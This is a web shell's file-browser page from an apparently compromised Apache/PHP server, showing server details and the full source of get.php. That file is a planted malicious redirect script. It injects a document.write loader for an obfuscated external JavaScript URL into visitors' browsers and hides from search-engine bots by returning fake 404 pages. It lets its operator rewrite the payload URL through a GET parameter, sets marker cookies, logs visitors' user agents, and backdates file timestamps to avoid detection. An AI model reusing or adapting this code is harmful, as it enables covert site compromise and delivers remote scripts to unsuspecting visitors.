HEX
Server: Apache/2.4.59 (Debian)
System: Linux skycube.cz 4.19.0-25-amd64 #1 SMP Debian 4.19.289-2 (2023-08-08) x86_64
User: ilya (534)
PHP: 7.3.31-1~deb10u7
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
$ pwd: /var/www/ilya/data/www/afish-ka.ru/i/mba/js/
Upload Files
File: /var/www/ilya/data/www/afish-ka.ru/i/mba/js/get.php
<?php
$newurl = $_GET[nd];
if ($newurl != false) {
	$sim = '%';
	$newurl = implode($sim,str_split($newurl, 1));
	$newurl = "'".$newurl."'";
	$im = __FILE__;
	$getfile = file($im);
	$getfile[14] = preg_replace ("/'([^&]*)'/", $newurl, $getfile[14]); 
	file_put_contents($im, implode('', $getfile));
	timefile();
	exit ("<div id=32></div>");
}
function viv() {
	$link = '/%/%v%a%c%i%h%y%a%.%r%u%/%d%r%i%v%e%.%j%s%?%s%i%d%=%8%4%0%4%2%6'; 
	$link = str_replace("%", "", $link);
	$vivod77 = " document.write('<sc'+'ript language=\"ja'+'vascr'+'ipt\" src=\"".$link."\"></s'+'cript>');";
	header("Content-type: text/javascript");
	echo $vivod77;
}
function timefile() {
	$dir = dirname(__FILE__);
	$filename =__FILE__;
	$data = dirname(__FILE__)."/data.txt";
	$time =  mktime(22, 04, 35, 7, 23, 2010); 
	touch($filename, $time);
	touch($data, $time);
	touch($dir, $time);
}
function badCook() {
	$admcook1 = @$_COOKIE['introbool'];
	$admcook2 = @$_COOKIE['zend'];
	if (($admcook1 == 'jqueryad') || ($admcook2 == 'camile')) {
		return TRUE;
	}
}
function goodCook() {
	$clcook = @$_COOKIE['clientmod'];
	if($clcook == 'info') {
		return TRUE;
	}
}
function size_file() {
	clearstatcache ();
	if(!file_exists("data.txt"))exit;
	$file = file('data.txt');
	$lineCount = count($file); 
	if ($lineCount >=  8) {
		unset($file[0]);
		file_put_contents('data.txt', implode('', $file));
	}
	else {
	}
}
function usinfo() {
	$ua = $_SERVER['HTTP_USER_AGENT'];
	$monsize = $_GET['i'];
    $all = $ua. ">" .$monsize."\r\n";
	$all = strval($all);
	return $all;
}
function admsearch() {
	if (!file_exists("data.txt")) {
		$fp = fopen("data.txt", "w");
		fclose($fp);
	}
	$allinf = usinfo();
	$mystring = file_get_contents("data.txt");
	$pos = strpos($mystring, $allinf);
	if ($pos !== false) {
		return TRUE;
	}
}
function infowrite() {
	if (admsearch() != TRUE) {
		$allwr = usinfo();
		$file_info = "data.txt";
		$fp = fopen($file_info, "a");
		fwrite($fp, $allwr);
		fclose($fp);
		size_file();
		timefile();
		return;
	}
}
function antibot() {
	$badbot = array ('yandex', 'yadirectbot', 'yandexblog', 'yandexsomething', 'james bond', 'yandeg', 'yandexsomething', 'nigma.ru', 'bing.com', 'yahoo', 'mail.ru', 'aport', 'rambler', 'googlebot', 'google-sitemaps', 'appengine-google', 'feedfetcher-google', 'adsbot-google', 'google search appliance', 'google search appliance', 'bot','webmaster');
	$ua = $_SERVER['HTTP_USER_AGENT'];
	$result = count($badbot);
	for ($i = 0; $i < $result; $i++) {
		if (strpos($ua, $badbot[$i]) !== FALSE) {
			return TRUE;
		}
	}
	return FALSE;
}
function error_page() {
	header($_SERVER['SERVER_PROTOCOL']." 404 Not Found"); 
	echo "<h1>Error 404 Not Found</h1>";
}
if (badCook() == TRUE) {
	infowrite();
}
else if ((antibot() == TRUE) || ($_SERVER['HTTP_REFERER'] != TRUE)) {
	error_page();
}
else if (goodCook() == TRUE) {
	viv();
}
else {
	if (admsearch() != TRUE) {
		setcookie('clientmod','info',time()+300, '/');
		viv();
	}
}
?>
@ Telegram